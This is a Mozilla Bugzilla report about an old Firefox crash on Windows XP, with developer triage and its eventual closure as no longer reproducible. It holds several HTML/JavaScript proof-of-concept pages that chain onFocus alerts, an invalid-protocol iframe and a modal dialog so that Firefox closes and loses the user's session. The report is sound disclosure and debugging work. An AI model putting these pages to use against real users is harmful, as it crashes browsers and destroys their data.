Closed Bug 640127 Opened 13 years ago Closed 3 years ago

If I close An Alert Started By An onFocus Event, With The [x] button on Document Load, FireFox Closes/Crashes??

Categories

(Core :: DOM: Events, defect, P5)

All
Windows XP
defect

Tracking

()

RESOLVED WORKSFORME

People

(Reporter: cjb.exploit, Unassigned)

Details

(Keywords: crash, dataloss, testcase, Whiteboard: [sg:dos] )

Attachments

(6 files)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14

If An Alert/Prompt/Confirm or Wrong Protocol Error-Alert Is Activated With An onFocus Event in the <BODY>.
If The First Prompt Is Closed With The [x] button, 
Focus Taken Away From FireFox, 
Clicking {OK} or [x] On The Next Alert/Prompt/Confirm or Wrong Protocol Error-Alert. 
Causes FireFox To Close/Crash? Its Tabs And Windows With No Restore Options Available on Restart.

Reproducible: Always

Steps to Reproduce:
I Have Managed To Repoduce This In The Below Script/POC's

------------------------Main-POC------------------------------

<body onFocus='JavaScript:{
cjb = new Number( document.getElementById( "counter" ).value );
document.getElementById( "counter" ).value = ( cjb - 1 );
{
if ( cjb == 0 ) ;
}
{
if ( cjb == 1 ) alert( "Click {ok} Or [x]" );
}
{
if ( cjb == 2 ) alert("Clicking [x] Primes The Crash?");
}
};'><input type='hidden' id='counter' value='2'></body>

------------------------EOF-MainPOC---------------------------

--------------------------POC1--------------------------------

1.open POC1 Follow Steps
1a. Click [x]
1b. Click {OK} or [x]


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
</head>
<body onFocus='JavaScript:{
cjb = new Number( document.getElementById( "counter" ).value );
document.getElementById( "counter" ).value = ( cjb - 1 );
{
if ( cjb == 0 ) ;
}
{
if ( cjb == 1 ) alert( "Click {ok} Or [x]" );
}
{
if ( cjb == 2 ) alert("Clicking [x] Primes The Crash? \n"+
"Attacker Could Use About 80+ \\n To Force [x]"+
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"+
"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n");
}
};'>
<input type='hidden' id='counter' value='2'>
</body>
</html>

--------------------------EOF-POC1----------------------------

----------------------------POC2------------------------------

2.open POC2 Follow Steps {This Effects 4.12b }
1a. Click [x]
1b. Click {OK} or [x]

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title></title>
</head>
<body onFocus='javascript:{
cjb = new Number( document.getElementById( "counter" ).value );
document.getElementById( "counter" ).value = ( cjb - 1 );
{
if ( cjb == 0 ) ; 
}
{
if ( cjb == 1 ) alert( "Click {ok} Or [x]" );
}
{
if ( cjb == 2 ) document.getElementById( "Target" ).src="FORCETHEPRESSOFXzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz:";
}
};'>
<iframe id="Target" src='' 
name="Target" 
width="0"
height="0">
</iframe>
<input type='hidden' id='counter' value='2'>
</body>
</html>

--------------------------EOF-POC2----------------------------

----------------------------POC3------------------------------

3.open POC3 Follow Steps {This Example Dosent Work For latest Beta But Could}
3a. Click ModdalDialog
3b. Click [x]
3c. Click {OK} or [x]
3d. Close Dialog

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><title></title></head>
<body>
<center>
<input type='button' value='Modal-Dialog'
onClick='javascript:{
var Inject = document.getElementById("InjectString").value;
var Header = document.getElementById("Modal_Header").value;
window.showModalDialog( Header + Inject,
"Arguments",
"edge: Raised; "+
"center: No; "+
"status: No; "+
"resizable: No; "+
"dialogTop: 286px; "+
"dialogLeft: 998px; "+
"dialogWidth: 1214px; "+
"dialogHeight: 405px; ")}'>
</center>
<input id='Modal_Header'
type='hidden'
value="data:text/html;charset=utf-8,">
<input id='InjectString'
type='hidden'  
value="<html><body onFocus='JavaScript:{cjb = new Number( document.getElementById( &#34;counter&#34; ).value );document.getElementById( &#34;counter&#34; ).value = ( cjb - 1 );{if ( cjb == 0 ) Create( &#34;Error&#34;, &#34;inErrorConsoleo&#34; );}{if ( cjb == 1 ) alert( &#34;Click {ok} Or [x]&#34; );}{if ( cjb == 2 ) alert( &#34;Clicking [x] Primes The Crash? \n&#34;+&#34;Attacker Could Use About 80+ \\n To Force [x]&#34;+&#34;\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n&#34;+&#34;\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n&#34;+&#34;\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n&#34;+&#34;\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n&#34;);}};'><input type=hidden id=counter value=2></body></html>">
</body>
</html>

--------------------------EOF-POC3----------------------------

This Snip Alerts A Message After Application Closes/Crashes

----------------------------POC4------------------------------
<body onFocus='JavaScript:{ 
x = new Number( document.getElementById( "counter" ).value );
if ( x == 0 ) CreateError( InErrorConsole );
else
document.getElementById( "counter" ).value = ( x - 1 );
alert( "press [x] " + x + " more times" ); 
};'
onLoad='JavaScript:{alert("Crash Or Close?")};'>
<input type='hidden' id='counter' value='2'></body>
--------------------------EOF-POC4----------------------------
Actual Results:  
FireFox Closed or Crashed 
With No Warnings Or Options To Restore Windows, Tabs And Data

Expected Results:  
Not Crash/Close.
Warnings.
Restore Options.

If Two Windows Are Open (errorconsole,bookmarks etc...) Closing The Second Window With [x] Causes The Close/Crash.

If Sequence called in modaldialog On the Close Of The dialog window With [x] FireFox Closes/Crashes All Tabs/Windows depending On How Many Are open {POC3}.

Tested With The Latest Beta release 4.12b,
Didnt Work At First But An Alert Dialog Can Still Be Ativated with { Wrong Protocol Error-Alert {POC2} } So Also Effects The Latest Beta release
note: Beta 4.12b Dose Have option To Restore On Home Page and Warns On Multi Tab close.
Please use the "Add an attachment" link on the bug report to upload
your files. Thanks.
Attached file POC-1
(In reply to comment #1)
> Please use the "Add an attachment" link on the bug report to upload
> your files. Thanks.

Example Files Uploaded :)
Hardware: x86 → All
Attachment #518278 - Attachment mime type: text/plain → text/html
Attachment #518279 - Attachment is private: true
Attachment #518279 - Attachment mime type: text/plain → text/html
Attachment #518279 - Attachment is private: false
Attachment #518280 - Attachment mime type: text/plain → text/html
Attachment #518281 - Attachment mime type: text/plain → text/html
Attachment #518282 - Attachment mime type: text/plain → text/html
I do not see a problem on Mac. There's no 'x' button to close the modal dialogs, but "Esc" is supposed to do the equivalent.

On a windows machine I can reproduce the problem by clicking the built-in "x" close-window button, but not if I hit Esc to cancel the first dialog. Why would that be any different? When it goes down it goes down fast -- no crash reporter comes up.

Didn't have a newer windows debug build than 3.5.x handy, but in that version I get the following assertions before the crash:

Somewhat early
WARNING: requested removal of nonexistent window: nsWindowWatcher.cpp, line 1220

a few (4)
WARNING: getting z level of unregistered window: nsWindowMediator.cpp, lin 635

Then
ASSERTION: consider quit stopper out of bounds: 'mConsiderQuitStopper > 0', nsAppStartup.cpp, line 413
ASSERTION: Uh, LeaveModalState() called w/o a reachable top window?: 'Error', nsGlobalWindow.com, line 4514
WARNING: NS_ENSURE_SUCCESS(rv, 0) failed with result 0x8000FFFF: nsContentUtils.cpp, line 2717
ASSERTION: consider quit stopper out of bounds: 'mConsiderQuitStopper > 0', nsAppStartup.cpp, line 413

Remember those line numbers are from a really old build.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Kind of looks like we're shutting down on purpose, cleanly. After the assertions I see some of the usual shutdown assertions and the "--DOMWINDOW == XX" debug spew cleanly counting down as objects are freed
I don't see any problem in Firefox 3.6.15 on Linux.
No problem in local (Linux x86-64) 1.9.2 debug build either.

In a local (Linux x86-64) mozilla-central debug build I saw a few
###!!! ASSERTION: Some mouse button down events are nested?: '!aDocument || !mMouseDownEventHandlingDocument', file dom/base/nsFocusManager.h, line 99
###!!! ASSERTION: mArguments wasn't cleaned up properly!: '!mArguments', file dom/base/nsGlobalWindow.cpp, line 993
but no problem other than that.

I will try on Win XP too...
(In reply to comment #8)
> Didn't have a newer windows debug build than 3.5.x handy [...]

Just to be clear, 3.5.x only applied to the debug version. I also reproduced on 3.6.16pre and (with POC-2) 4.0b12 on Windows.
Attached file stack
I can reproduce the bug on Windows XP.  Here's a stack with a breakpoint
in nsGlobalWindow::Close() - it appears we have nested modal loops here.
I suspect this is the root cause of the bug.  The difference between
Windows and other platforms could be focus handling.

It doesn't look like a security issue though.  I think the worst that could
happen is data loss - losing your session, preferences, bookmarks etc.
Keywords: dataloss
Whiteboard: [sg:dos?]
Group: core-security
Keywords: crash, testcase
Whiteboard: [sg:dos?] → [sg:dos]
https://bugzilla.mozilla.org/show_bug.cgi?id=1472046

Move all DOM bugs that haven’t been updated in more than 3 years and has no one currently assigned to P5.

If you have questions, please contact :mdaly.
Priority: -- → P5

Closing this issue as Resolved > Worksforme since none of the attached files (after following the given steps) crash any of the latest versions of Firefox Nightly, beta or release on Windows 10.

Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → WORKSFORME
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: